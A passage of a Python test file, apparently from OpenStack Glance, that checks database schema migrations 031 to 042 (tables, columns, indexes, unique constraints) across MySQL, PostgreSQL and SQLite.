locations_table.insert().values(temp).execute()\n        return image_id\n\n    def _check_031(self, engine, image_id):\n        locations_table = db_utils.get_table(engine, 'image_locations')\n        result = locations_table.select().where(\n            locations_table.c.image_id == image_id).execute().fetchall()\n\n        locations = set([(x['value'], x['meta_data']) for x in result])\n        actual_locations = set([\n            ('file://ab', '{\"a\": \"yo yo\"}'),\n            ('file://ab', '{}'),\n            ('file://ab1', '{\"a\": \"that one, please\"}'),\n        ])\n        self.assertFalse(actual_locations.symmetric_difference(locations))\n\n    def _pre_upgrade_032(self, engine):\n        self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n                          db_utils.get_table, engine, 'task_info')\n\n        tasks = db_utils.get_table(engine, 'tasks')\n        now = datetime.datetime.now()\n        base_values = {\n            'deleted': False,\n            'created_at': now,\n            'updated_at': now,\n            'status': 'active',\n            'owner': 'TENANT',\n            'type': 'import',\n        }\n        data = [\n            {\n                'id': 'task-1',\n                'input': 'some input',\n                'message': None,\n                'result': 'successful'\n            },\n            {\n                'id': 'task-2',\n                'input': None,\n                'message': None,\n                'result': None\n            },\n        ]\n        # Apply base_values in a plain loop; under py3 a bare map() call is\n        # lazy and would never run the updates.\n        for task in data:\n            task.update(base_values)\n            tasks.insert().values(task).execute()\n        return data\n\n    def _check_032(self, engine, data):\n        task_info_table = db_utils.get_table(engine, 'task_info')\n\n        task_info_refs = task_info_table.select().execute().fetchall()\n\n        self.assertEqual(2, len(task_info_refs))\n\n        for x in range(len(task_info_refs)):\n            self.assertEqual(task_info_refs[x].task_id, data[x]['id'])\n            self.assertEqual(task_info_refs[x].input, data[x]['input'])\n            self.assertEqual(task_info_refs[x].result, data[x]['result'])\n            self.assertIsNone(task_info_refs[x].message)\n\n        tasks_table = db_utils.get_table(engine, 'tasks')\n        self.assertNotIn('input', tasks_table.c)\n        self.assertNotIn('result', tasks_table.c)\n        self.assertNotIn('message', tasks_table.c)\n\n    def _post_downgrade_032(self, engine):\n        self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n                          db_utils.get_table, engine, 'task_info')\n\n        tasks_table = db_utils.get_table(engine, 'tasks')\n        records = tasks_table.select().execute().fetchall()\n        self.assertEqual(2, len(records))\n\n        tasks = {t.id: t for t in records}\n\n        task_1 = tasks.get('task-1')\n        self.assertEqual('some input', task_1.input)\n        self.assertEqual('successful', task_1.result)\n        self.assertIsNone(task_1.message)\n\n        task_2 = tasks.get('task-2')\n        self.assertIsNone(task_2.input)\n        self.assertIsNone(task_2.result)\n        self.assertIsNone(task_2.message)\n\n    def _pre_upgrade_033(self, engine):\n        images = db_utils.get_table(engine, 'images')\n        image_locations = db_utils.get_table(engine, 'image_locations')\n\n        now = datetime.datetime.now()\n        image_id = 'fake_id_028_%d'\n        url = 'file:///some/place/onthe/fs_%d'\n        status_list = ['active', 'saving', 'queued', 'killed',\n                       'pending_delete', 'deleted']\n        image_id_list = []\n\n        for (idx, status) in enumerate(status_list):\n            temp = dict(deleted=False,\n                        created_at=now,\n                        updated_at=now,\n                        status=status,\n                        is_public=True,\n                        min_disk=0,\n                        min_ram=0,\n                        id=image_id % idx)\n            images.insert().values(temp).execute()\n\n            temp = dict(deleted=False,\n                        created_at=now,\n                        updated_at=now,\n                        image_id=image_id % idx,\n                        value=url % idx)\n            image_locations.insert().values(temp).execute()\n\n            image_id_list.append(image_id % idx)\n        return image_id_list\n\n    def _check_033(self, engine, data):\n        image_locations = db_utils.get_table(engine, 'image_locations')\n\n        self.assertIn('status', image_locations.c)\n        self.assertEqual(30, 
image_locations.c['status'].type.length)\n\n status_list = ['active', 'active', 'active',\n 'deleted', 'pending_delete', 'deleted']\n\n for (idx, image_id) in enumerate(data):\n results = image_locations.select().where(\n image_locations.c.image_id == image_id).execute()\n r = list(results)\n self.assertEqual(1, len(r))\n self.assertIn('status', r[0])\n self.assertEqual(r[0]['status'], status_list[idx])\n\n def _post_downgrade_033(self, engine):\n image_locations = db_utils.get_table(engine, 'image_locations')\n self.assertNotIn('status', image_locations.c)\n\n def _pre_upgrade_034(self, engine):\n images = db_utils.get_table(engine, 'images')\n\n now = datetime.datetime.now()\n image_id = 'fake_id_034'\n temp = dict(deleted=False,\n created_at=now,\n status='active',\n is_public=True,\n min_disk=0,\n min_ram=0,\n id=image_id)\n images.insert().values(temp).execute()\n\n def _check_034(self, engine, data):\n images = db_utils.get_table(engine, 'images')\n self.assertIn('virtual_size', images.c)\n\n result = (images.select()\n .where(images.c.id == 'fake_id_034')\n .execute().fetchone())\n self.assertIsNone(result.virtual_size)\n\n def _post_downgrade_034(self, engine):\n images = db_utils.get_table(engine, 'images')\n self.assertNotIn('virtual_size', images.c)\n\n def _pre_upgrade_035(self, engine):\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine, 'metadef_namespaces')\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine, 'metadef_properties')\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine, 'metadef_objects')\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine, 'metadef_resource_types')\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine,\n 'metadef_namespace_resource_types')\n\n def _check_035(self, engine, data):\n meta = sqlalchemy.MetaData()\n meta.bind = engine\n\n # metadef_namespaces\n table = sqlalchemy.Table(\"metadef_namespaces\", meta, autoload=True)\n index_namespace = ('ix_namespaces_namespace', ['namespace'])\n index_data = [(idx.name, idx.columns.keys())\n for idx in table.indexes]\n self.assertIn(index_namespace, index_data)\n\n expected_cols = [u'id',\n u'namespace',\n u'display_name',\n u'description',\n u'visibility',\n u'protected',\n u'owner',\n u'created_at',\n u'updated_at']\n col_data = [col.name for col in table.columns]\n self.assertEqual(expected_cols, col_data)\n\n # metadef_objects\n table = sqlalchemy.Table(\"metadef_objects\", meta, autoload=True)\n index_namespace_id_name = (\n 'ix_objects_namespace_id_name', ['namespace_id', 'name'])\n index_data = [(idx.name, idx.columns.keys())\n for idx in table.indexes]\n self.assertIn(index_namespace_id_name, index_data)\n\n expected_cols = [u'id',\n u'namespace_id',\n u'name',\n u'description',\n u'required',\n u'schema',\n u'created_at',\n u'updated_at']\n col_data = [col.name for col in table.columns]\n self.assertEqual(expected_cols, col_data)\n\n # metadef_properties\n table = sqlalchemy.Table(\"metadef_properties\", meta, autoload=True)\n index_namespace_id_name = (\n 'ix_metadef_properties_namespace_id_name',\n ['namespace_id', 'name'])\n index_data = [(idx.name, idx.columns.keys())\n for idx in table.indexes]\n self.assertIn(index_namespace_id_name, index_data)\n\n expected_cols = [u'id',\n u'namespace_id',\n u'name',\n u'schema',\n u'created_at',\n u'updated_at']\n col_data = [col.name for col in table.columns]\n self.assertEqual(expected_cols, 
col_data)\n\n # metadef_resource_types\n table = sqlalchemy.Table(\n \"metadef_resource_types\", meta, autoload=True)\n index_resource_types_name = (\n 'ix_metadef_resource_types_name', ['name'])\n index_data = [(idx.name, idx.columns.keys())\n for idx in table.indexes]\n self.assertIn(index_resource_types_name, index_data)\n\n expected_cols = [u'id',\n u'name',\n u'protected',\n u'created_at',\n u'updated_at']\n col_data = [col.name for col in table.columns]\n self.assertEqual(expected_cols, col_data)\n\n # metadef_namespace_resource_types\n table = sqlalchemy.Table(\n \"metadef_namespace_resource_types\", meta, autoload=True)\n index_ns_res_types_res_type_id_ns_id = (\n 'ix_metadef_ns_res_types_res_type_id_ns_id',\n ['resource_type_id', 'namespace_id'])\n index_data = [(idx.name, idx.columns.keys())\n for idx in table.indexes]\n self.assertIn(index_ns_res_types_res_type_id_ns_id, index_data)\n\n expected_cols = [u'resource_type_id',\n u'namespace_id',\n u'properties_target',\n u'prefix',\n u'created_at',\n u'updated_at']\n col_data = [col.name for col in table.columns]\n self.assertEqual(expected_cols, col_data)\n\n def _post_downgrade_035(self, engine):\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine, 'metadef_namespaces')\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine, 'metadef_properties')\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine, 'metadef_objects')\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine, 'metadef_resource_types')\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine,\n 'metadef_namespace_resource_types')\n\n def _pre_upgrade_036(self, engine):\n meta = sqlalchemy.MetaData()\n meta.bind = engine\n\n # metadef_objects\n table = sqlalchemy.Table(\"metadef_objects\", meta, autoload=True)\n expected_cols = [u'id',\n u'namespace_id',\n u'name',\n u'description',\n u'required',\n u'schema',\n u'created_at',\n u'updated_at']\n col_data = [col.name for col in table.columns]\n self.assertEqual(expected_cols, col_data)\n\n # metadef_properties\n table = sqlalchemy.Table(\"metadef_properties\", meta, autoload=True)\n expected_cols = [u'id',\n u'namespace_id',\n u'name',\n u'schema',\n u'created_at',\n u'updated_at']\n col_data = [col.name for col in table.columns]\n self.assertEqual(expected_cols, col_data)\n\n def _check_036(self, engine, data):\n meta = sqlalchemy.MetaData()\n meta.bind = engine\n\n # metadef_objects\n table = sqlalchemy.Table(\"metadef_objects\", meta, autoload=True)\n expected_cols = [u'id',\n u'namespace_id',\n u'name',\n u'description',\n u'required',\n u'json_schema',\n u'created_at',\n u'updated_at']\n col_data = [col.name for col in table.columns]\n self.assertEqual(expected_cols, col_data)\n\n # metadef_properties\n table = sqlalchemy.Table(\"metadef_properties\", meta, autoload=True)\n expected_cols = [u'id',\n u'namespace_id',\n u'name',\n u'json_schema',\n u'created_at',\n u'updated_at']\n col_data = [col.name for col in table.columns]\n self.assertEqual(expected_cols, col_data)\n\n def _post_downgrade_036(self, engine):\n meta = sqlalchemy.MetaData()\n meta.bind = engine\n\n # metadef_objects\n table = sqlalchemy.Table(\"metadef_objects\", meta, autoload=True)\n expected_cols = [u'id',\n u'namespace_id',\n u'name',\n u'description',\n u'required',\n u'schema',\n u'created_at',\n u'updated_at']\n col_data = [col.name for col in table.columns]\n self.assertEqual(expected_cols, 
col_data)\n\n # metadef_properties\n table = sqlalchemy.Table(\"metadef_properties\", meta, autoload=True)\n expected_cols = [u'id',\n u'namespace_id',\n u'name',\n u'schema',\n u'created_at',\n u'updated_at']\n col_data = [col.name for col in table.columns]\n self.assertEqual(expected_cols, col_data)\n\n def _check_037(self, engine, data):\n if engine.name == 'mysql':\n self.assertFalse(unique_constraint_exist('image_id',\n 'image_properties',\n engine))\n\n self.assertTrue(unique_constraint_exist(\n 'ix_image_properties_image_id_name',\n 'image_properties',\n engine))\n\n image_members = db_utils.get_table(engine, 'image_members')\n images = db_utils.get_table(engine, 'images')\n\n self.assertFalse(image_members.c.status.nullable)\n self.assertFalse(images.c.protected.nullable)\n\n now = datetime.datetime.now()\n temp = dict(\n deleted=False,\n created_at=now,\n status='active',\n is_public=True,\n min_disk=0,\n min_ram=0,\n id='fake_image_035'\n )\n images.insert().values(temp).execute()\n\n image = (images.select()\n .where(images.c.id == 'fake_image_035')\n .execute().fetchone())\n\n self.assertFalse(image['protected'])\n\n temp = dict(\n deleted=False,\n created_at=now,\n image_id='fake_image_035',\n member='fake_member',\n can_share=True,\n id=3\n )\n\n image_members.insert().values(temp).execute()\n\n image_member = (image_members.select()\n .where(image_members.c.id == 3)\n .execute().fetchone())\n\n self.assertEqual('pending', image_member['status'])\n\n def _post_downgrade_037(self, engine):\n if engine.name == 'mysql':\n self.assertTrue(unique_constraint_exist('image_id',\n 'image_properties',\n engine))\n\n if engine.name == 'postgresql':\n self.assertTrue(index_exist('ix_image_properties_image_id_name',\n 'image_properties', engine))\n\n self.assertFalse(unique_constraint_exist(\n 'ix_image_properties_image_id_name',\n 'image_properties',\n engine))\n\n image_members = db_utils.get_table(engine, 'image_members')\n images = db_utils.get_table(engine, 'images')\n\n self.assertTrue(image_members.c.status.nullable)\n self.assertTrue(images.c.protected.nullable)\n\n now = datetime.datetime.now()\n temp = dict(\n deleted=False,\n created_at=now,\n status='active',\n is_public=True,\n min_disk=0,\n min_ram=0,\n id='fake_image_035_d'\n )\n images.insert().values(temp).execute()\n\n image = (images.select()\n .where(images.c.id == 'fake_image_035_d')\n .execute().fetchone())\n\n self.assertIsNone(image['protected'])\n\n temp = dict(\n deleted=False,\n created_at=now,\n image_id='fake_image_035_d',\n member='fake_member',\n can_share=True,\n id=4\n )\n\n image_members.insert().values(temp).execute()\n\n image_member = (image_members.select()\n .where(image_members.c.id == 4)\n .execute().fetchone())\n\n self.assertIsNone(image_member['status'])\n\n def _pre_upgrade_038(self, engine):\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine, 'metadef_tags')\n\n def _check_038(self, engine, data):\n meta = sqlalchemy.MetaData()\n meta.bind = engine\n\n # metadef_tags\n table = sqlalchemy.Table(\"metadef_tags\", meta, autoload=True)\n expected_cols = [u'id',\n u'namespace_id',\n u'name',\n u'created_at',\n u'updated_at']\n col_data = [col.name for col in table.columns]\n self.assertEqual(expected_cols, col_data)\n\n def _post_downgrade_038(self, engine):\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine, 'metadef_tags')\n\n def _check_039(self, engine, data):\n meta = sqlalchemy.MetaData()\n meta.bind = engine\n\n metadef_namespaces 
= sqlalchemy.Table('metadef_namespaces', meta,\n autoload=True)\n metadef_properties = sqlalchemy.Table('metadef_properties', meta,\n autoload=True)\n metadef_objects = sqlalchemy.Table('metadef_objects', meta,\n autoload=True)\n metadef_ns_res_types = sqlalchemy.Table(\n 'metadef_namespace_resource_types',\n meta, autoload=True)\n metadef_resource_types = sqlalchemy.Table('metadef_resource_types',\n meta, autoload=True)\n\n tables = [metadef_namespaces, metadef_properties, metadef_objects,\n metadef_ns_res_types, metadef_resource_types]\n\n for table in tables:\n for index_name in ['ix_namespaces_namespace',\n 'ix_objects_namespace_id_name',\n 'ix_metadef_properties_namespace_id_name']:\n self.assertFalse(index_exist(index_name, table.name, engine))\n for uc_name in ['resource_type_id', 'namespace', 'name',\n 'namespace_id',\n 'metadef_objects_namespace_id_name_key',\n 'metadef_properties_namespace_id_name_key']:\n self.assertFalse(unique_constraint_exist(uc_name, table.name,\n engine))\n\n self.assertTrue(index_exist('ix_metadef_ns_res_types_namespace_id',\n metadef_ns_res_types.name, engine))\n\n self.assertTrue(index_exist('ix_metadef_namespaces_namespace',\n metadef_namespaces.name, engine))\n\n self.assertTrue(index_exist('ix_metadef_namespaces_owner',\n metadef_namespaces.name, engine))\n\n self.assertTrue(index_exist('ix_metadef_objects_name',\n metadef_objects.name, engine))\n\n self.assertTrue(index_exist('ix_metadef_objects_namespace_id',\n metadef_objects.name, engine))\n\n self.assertTrue(index_exist('ix_metadef_properties_name',\n metadef_properties.name, engine))\n\n self.assertTrue(index_exist('ix_metadef_properties_namespace_id',\n metadef_properties.name, engine))\n\n def _post_downgrade_039(self, engine):\n meta = sqlalchemy.MetaData()\n meta.bind = engine\n\n metadef_namespaces = sqlalchemy.Table('metadef_namespaces', meta,\n autoload=True)\n metadef_properties = sqlalchemy.Table('metadef_properties', meta,\n autoload=True)\n metadef_objects = sqlalchemy.Table('metadef_objects', meta,\n autoload=True)\n metadef_ns_res_types = sqlalchemy.Table(\n 'metadef_namespace_resource_types',\n meta, autoload=True)\n metadef_resource_types = sqlalchemy.Table('metadef_resource_types',\n meta, autoload=True)\n\n self.assertFalse(index_exist('ix_metadef_ns_res_types_namespace_id',\n metadef_ns_res_types.name, engine))\n\n self.assertFalse(index_exist('ix_metadef_namespaces_namespace',\n metadef_namespaces.name, engine))\n\n self.assertFalse(index_exist('ix_metadef_namespaces_owner',\n metadef_namespaces.name, engine))\n\n self.assertFalse(index_exist('ix_metadef_objects_name',\n metadef_objects.name, engine))\n\n self.assertFalse(index_exist('ix_metadef_objects_namespace_id',\n metadef_objects.name, engine))\n\n self.assertFalse(index_exist('ix_metadef_properties_name',\n metadef_properties.name, engine))\n\n self.assertFalse(index_exist('ix_metadef_properties_namespace_id',\n metadef_properties.name, engine))\n\n self.assertTrue(index_exist('ix_namespaces_namespace',\n metadef_namespaces.name, engine))\n\n self.assertTrue(index_exist('ix_objects_namespace_id_name',\n metadef_objects.name, engine))\n\n self.assertTrue(index_exist('ix_metadef_properties_namespace_id_name',\n metadef_properties.name, engine))\n\n if engine.name == 'postgresql':\n inspector = inspect(engine)\n\n self.assertEqual(1, len(inspector.get_unique_constraints(\n 'metadef_objects')))\n\n self.assertEqual(1, len(inspector.get_unique_constraints(\n 'metadef_properties')))\n\n if engine.name == 'mysql':\n 
self.assertTrue(unique_constraint_exist(\n 'namespace_id', metadef_properties.name, engine))\n\n self.assertTrue(unique_constraint_exist(\n 'namespace_id', metadef_objects.name, engine))\n\n self.assertTrue(unique_constraint_exist(\n 'resource_type_id', metadef_ns_res_types.name, engine))\n\n self.assertTrue(unique_constraint_exist(\n 'namespace', metadef_namespaces.name, engine))\n\n self.assertTrue(unique_constraint_exist(\n 'name', metadef_resource_types.name, engine))\n\n def _check_040(self, engine, data):\n meta = sqlalchemy.MetaData()\n meta.bind = engine\n metadef_tags = sqlalchemy.Table('metadef_tags', meta, autoload=True)\n\n if engine.name == 'mysql':\n self.assertFalse(index_exist('namespace_id',\n metadef_tags.name, engine))\n\n def _pre_upgrade_041(self, engine):\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine,\n 'artifacts')\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine,\n 'artifact_tags')\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine,\n 'artifact_properties')\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine,\n 'artifact_blobs')\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine,\n 'artifact_dependencies')\n self.assertRaises(sqlalchemy.exc.NoSuchTableError,\n db_utils.get_table, engine,\n 'artifact_locations')\n\n def _check_041(self, engine, data):\n artifacts_indices = [('ix_artifact_name_and_version',\n ['name', 'version_prefix', 'version_suffix']),\n ('ix_artifact_type',\n ['type_name',\n 'type_version_prefix',\n 'type_version_suffix']),\n ('ix_artifact_state', ['state']),\n ('ix_artifact_visibility', ['visibility']),\n ('ix_artifact_owner', ['owner'])]\n artifacts_columns = ['id',\n 'name',\n 'type_name',\n 'type_version_prefix',\n 'type_version_suffix',\n 'type_version_meta',\n 'version_prefix',\n 'version_suffix',\n 'version_meta',\n 'description',\n 'visibility',\n 'state',\n 'owner',\n 'created_at',\n 'updated_at',\n 'deleted_at',\n 'published_at']\n self.assert_table(engine, 'artifacts', artifacts_indices,\n artifacts_columns)\n\n tags_indices = [('ix_artifact_tags_artifact_id', ['artifact_id']),\n ('ix_artifact_tags_artifact_id_tag_value',\n ['artifact_id',\n 'value'])]\n tags_columns = ['id',\n 'artifact_id',\n 'value',\n 'created_at',\n 'updated_at']\n self.assert_table(engine, 'artifact_tags', tags_indices, tags_columns)\n\n prop_indices = [\n ('ix_artifact_properties_artifact_id', ['artifact_id']),\n ('ix_artifact_properties_name', ['name'])]\n prop_columns = ['id',\n 'artifact_id',\n 'name',\n 'string_value',\n 'int_value',\n 'numeric_value',\n 'bool_value',\n 'text_value',\n 'created_at',\n 'updated_at',\n 'position']\n self.assert_table(engine, 'artifact_properties', prop_indices,\n prop_columns)\n\n blobs_indices = [\n ('ix_artifact_blobs_artifact_id', ['artifact_id']),\n ('ix_artifact_blobs_name', ['name'])]\n blobs_columns = ['id',\n 'artifact_id',\n 'size',\n 'checksum',\n 'name',\n 'item_key',\n 'position',\n 'created_at',\n 'updated_at']\n self.assert_table(engine, 'artifact_blobs', blobs_indices,\n blobs_columns)\n\n dependencies_indices = [\n ('ix_artifact_dependencies_source_id', ['artifact_source']),\n ('ix_artifact_dependencies_direct_dependencies',\n ['artifact_source', 'is_direct']),\n ('ix_artifact_dependencies_dest_id', ['artifact_dest']),\n ('ix_artifact_dependencies_origin_id', ['artifact_origin'])]\n dependencies_columns = ['id',\n 'artifact_source',\n 'artifact_dest',\n 
'artifact_origin',\n 'is_direct',\n 'position',\n 'name',\n 'created_at',\n 'updated_at']\n self.assert_table(engine, 'artifact_dependencies',\n dependencies_indices,\n dependencies_columns)\n\n locations_indices = [\n ('ix_artifact_blob_locations_blob_id', ['blob_id'])]\n locations_columns = ['id',\n 'blob_id',\n 'value',\n 'created_at',\n 'updated_at',\n 'position',\n 'status']\n self.assert_table(engine, 'artifact_blob_locations', locations_indices,\n locations_columns)\n\n def _pre_upgrade_042(self, engine):\n meta = sqlalchemy.MetaData()\n meta.bind = engine\n\n metadef_namespaces = sqlalchemy.Table('metadef_namespaces', meta,\n autoload=True)\n metadef_objects = sqlalchemy.Table('metadef_objects', meta,\n autoload=True)\n metadef_properties = sqlalchemy.Table('metadef_properties', meta,\n autoload=True)\n metadef_tags = sqlalchemy.Table('metadef_tags', meta, autoload=True)\n metadef_resource_types = sqlalchemy.Table('metadef_resource_types',\n meta, autoload=True)\n metadef_ns_res_types = sqlalchemy.Table(\n 'metadef_namespace_resource_types',\n meta, autoload=True)\n\n # These will be dropped and recreated as unique constraints.\n self.assertTrue(index_exist('ix_metadef_namespaces_namespace',\n metadef_namespaces.name, engine))\n self.assertTrue(index_exist('ix_metadef_objects_namespace_id',\n metadef_objects.name, engine))\n self.assertTrue(index_exist('ix_metadef_properties_namespace_id',\n metadef_properties.name, engine))\n self.assertTrue(index_exist('ix_metadef_tags_namespace_id',\n metadef_tags.name, engine))\n self.assertTrue(index_exist('ix_metadef_resource_types_name',\n metadef_resource_types.name, engine))\n\n # This one will be dropped - not needed\n self.assertTrue(index_exist(\n 'ix_metadef_ns_res_types_res_type_id_ns_id',\n metadef_ns_res_types.name, engine))\n\n # The rest must remain\n self.assertTrue(index_exist('ix_metadef_namespaces_owner',\n metadef_namespaces.name, engine))\n self.assertTrue(index_exist('ix_metadef_objects_name',\n metadef_objects.name, engine))\n self.assertTrue(index_exist('ix_metadef_properties_name',\n metadef_properties.name, engine))\n self.assertTrue(index_exist('ix_metadef_tags_name',\n metadef_tags.name, engine))\n self.assertTrue(index_exist('ix_metadef_ns_res_types_namespace_id',\n metadef_ns_res_types.name, engine))\n\n # To be created\n self.assertFalse(unique_constraint_exist\n ('uq_metadef_objects_namespace_id_name',\n metadef_objects.name, engine)\n )\n self.assertFalse(unique_constraint_exist\n ('uq_metadef_properties_namespace_id_name',\n metadef_properties.name, engine)\n )\n self.assertFalse(unique_constraint_exist\n ('uq_metadef_tags_namespace_id_name',\n metadef_tags.name, engine)\n )\n self.assertFalse(unique_constraint_exist\n ('uq_metadef_namespaces_namespace',\n metadef_namespaces.name, engine)\n )\n self.assertFalse(unique_constraint_exist\n ('uq_metadef_resource_types_name',\n metadef_resource_types.name, engine)\n )\n\n def _check_042(self, engine, data):\n meta = sqlalchemy.MetaData()\n meta.bind = engine\n\n metadef_namespaces = sqlalchemy.Table('metadef_namespaces', meta,\n autoload=True)\n metadef_objects = sqlalchemy.Table('metadef_objects', meta,\n autoload=True)\n metadef_properties = sqlalchemy.Table('metadef_properties', meta,\n autoload=True)\n metadef_tags = sqlalchemy.Table('metadef_tags', meta, autoload=True)\n metadef_resource_types = sqlalchemy.Table('metadef_resource_types',\n meta, autoload=True)\n metadef_ns_res_types = sqlalchemy.Table(\n 'metadef_namespace_resource_types',\n meta, 
autoload=True)\n\n # Dropped for unique constraints\n self.assertFalse(index_exist('ix_metadef_namespaces_namespace',\n metadef_namespaces.name, engine))\n self.assertFalse(index_exist('ix_metadef_objects_namespace_id',\n metadef_objects.name, engine))\n self.assertFalse(index_exist('ix_metadef_properties_namespace_id',\n metadef_properties.name, engine))\n self.assertFalse(index_exist('ix_metadef_tags_namespace_id',\n metadef_tags.name, engine))\n self.assertFalse(index_exist('ix_metadef_resource_types_name',\n metadef_resource_types.name, engine))\n\n # Dropped - not needed because of the existing primary key\n self.assertFalse(index_exist(\n 'ix_metadef_ns_res_types_res_type_id_ns_id',\n metadef_ns_res_types.name, engine))\n\n # Still exist as before\n self.assertTrue(index_exist('ix_metadef_namespaces_owner',\n metadef_namespaces.name, engine))\n self.assertTrue(index_exist('ix_metadef_ns_res_types_namespace_id',\n metadef_ns_res_types.name, engine))\n self.assertTrue(index_exist('ix_metadef_objects_name',\n metadef_objects.name, engine))\n self.assertTrue(index_exist('ix_metadef_properties_name',\n metadef_properties.name, engine))\n self.assertTrue(index_exist('ix_metadef_tags_name',\n metadef_tags.name, engine))\n\n self.assertTrue(unique_constraint_exist\n ('uq_metadef_namespaces_namespace',\n metadef_namespaces.name, engine)\n )\n self.assertTrue(unique_constraint_exist\n ('uq_metadef_objects_namespace_id_name',\n metadef_objects.name, engine)\n )\n self.assertTrue(unique_constraint_exist\n ('uq_metadef_properties_namespace_id_name',\n metadef_properties.name, engine)\n )\n self.assertTrue(unique_constraint_exist\n ('uq_metadef_tags_namespace_id_name',\n metadef_tags.name, engine)\n )\n self.assertTrue(unique_constraint_exist\n ('uq_metadef_resource_types_name',\n metadef_resource_types.name, engine)\n )\n\n def _post_downgrade_042(self, engine):\n meta = sqlalchemy.MetaData()\n meta.bind = engine\n\n metadef_namespaces = sqlalchemy.Table('metadef_namespaces', meta,\n autoload=True)\n metadef_objects = sqlalchemy.Table('metadef_objects', meta,\n autoload=True)\n metadef_properties = sqlalchemy.Table('metadef_properties', meta,\n autoload=True)\n metadef_tags = sqlalchemy.Table('metadef_tags', meta, autoload=True)\n metadef_resource_types = sqlalchemy.Table('metadef_resource_types',\n meta, autoload=True)\n metadef_ns_res_types = sqlalchemy.Table(\n 'metadef_namespace_resource_types',\n meta, autoload=True)\n\n # These have been recreated\n self.assertTrue(index_exist('ix_metadef_namespaces_namespace',\n metadef_namespaces.name, engine))\n self.assertTrue(index_exist('ix_metadef_objects_namespace_id',\n metadef_objects.name, engine))\n self.assertTrue(index_exist('ix_metadef_properties_namespace_id',\n metadef_properties.name, engine))\n self.assertTrue(index_exist('ix_metadef_tags_namespace_id',\n metadef_tags.name, engine))\n self.assertTrue(index_exist('ix_metadef_resource_types_name',\n metadef_resource_types.name, engine))\n\n self.assertTrue(index_exist(\n 'ix_metadef_ns_res_types_res_type_id_ns_id',\n metadef_ns_res_types.name, engine))\n\n # The rest must remain\n self.assertTrue(index_exist('ix_metadef_namespaces_owner',\n metadef_namespaces.name, engine))\n self.assertTrue(index_exist('ix_metadef_objects_name',\n metadef_objects.name, engine))\n self.assertTrue(index_exist('ix_metadef_properties_name',\n metadef_properties.name, engine))\n self.assertTrue(index_exist('ix_metadef_tags_name',\n metadef_tags.name, engine))\n 
self.assertTrue(index_exist('ix_metadef_ns_res_types_namespace_id',\n metadef_ns_res_types.name, engine))\n\n # Dropped\n self.assertFalse(unique_constraint_exist\n ('uq_metadef_objects_namespace_id_name',\n metadef_objects.name, engine)\n )\n self.assertFalse(unique_constraint_exist\n ('uq_metadef_properties_namespace_id_name',\n metadef_properties.name, engine)\n )\n self.assertFalse(unique_constraint_exist\n ('uq_metadef_tags_namespace_id_name',\n metadef_tags.name, engine)\n )\n self.assertFalse(unique_constraint_exist\n ('uq_metadef_namespaces_namespace',\n metadef_namespaces.name, engine)\n )\n self.assertFalse(unique_constraint_exist\n ('uq_metadef_resource_types_name',\n metadef_resource_types.name, engine)\n )\n\n def assert_table(self, engine, table_name, indices, columns):\n table = db_utils.get_table(engine, table_name)\n index_data = [(index.name, index.columns.keys()) for index in\n table.indexes]\n column_data = [column.name for column in table.columns]\n # instead of calling assertItemsEqual, which is not present in py26\n # asserting equality of lengths and sorted collections\n self.assertEqual(len(columns), len(column_data))\n self.assertEqual(sorted(columns), sorted(column_data))\n self.assertEqual(len(indices), len(index_data))\n self.assertEqual(sorted(indices), sorted(index_data))\n\n\nclass TestMysqlMigrations(test_base.MySQLOpportunisticTestCase,\n MigrationsMixin):\n\n def test_mysql_innodb_tables(self):\n migration.db_sync(engine=self.migrate_engine)\n\n total = self.migrate_engine.execute(\n \"SELECT COUNT(*) \"\n \"FROM information_schema.TABLES \"\n \"WHERE TABLE_SCHEMA='%s'\"\n % self.migrate_engine.url.database)\n self.assertTrue(total.scalar() > 0, \"No tables found. Wrong schema?\")\n\n noninnodb = self.migrate_engine.execute(\n \"SELECT count(*) \"\n \"FROM information_schema.TABLES \"\n \"WHERE TABLE_SCHEMA='%s' \"\n \"AND ENGINE!='InnoDB' \"\n \"AND TABLE_NAME!='migrate_version'\"\n % self.migrate_engine.url.database)\n count = noninnodb.scalar()\n self.assertEqual(count, 0, \"%d non InnoDB tables created\" % count)\n\n\nclass TestPostgresqlMigrations(test_base.PostgreSQLOpportunisticTestCase,\n MigrationsMixin):\n pass\n\n\nclass TestSqliteMigrations(test_base.DbTestCase,\n MigrationsMixin):\n def test_walk_versions(self):\n # No more downgrades\n self._walk_versions(False, False)\n\n\nclass ModelsMigrationSyncMixin(object):\n\n def get_metadata(self):\n for table in models_metadef.BASE_DICT.metadata.sorted_tables:\n models.BASE.metadata._add_table(table.name, table.schema, table)\n for table in models_artifacts.BASE.metadata.sorted_tables:\n models.BASE.metadata._add_table(table.name, table.schema, table)\n return models.BASE.metadata\n\n def get_engine(self):\n return self.engine\n\n def db_sync(self, engine):\n migration.db_sync(engine=engine)\n\n def include_object(self, object_, name, type_, reflected, compare_to):\n if name in ['migrate_version'] and type_ == 'table':\n return False\n return True\n\n\nclass ModelsMigrationsSyncMysql(ModelsMigrationSyncMixin,\n test_migrations.ModelsMigrationsSync,\n test_base.MySQLOpportunisticTestCase):\n pass\n\n\nclass 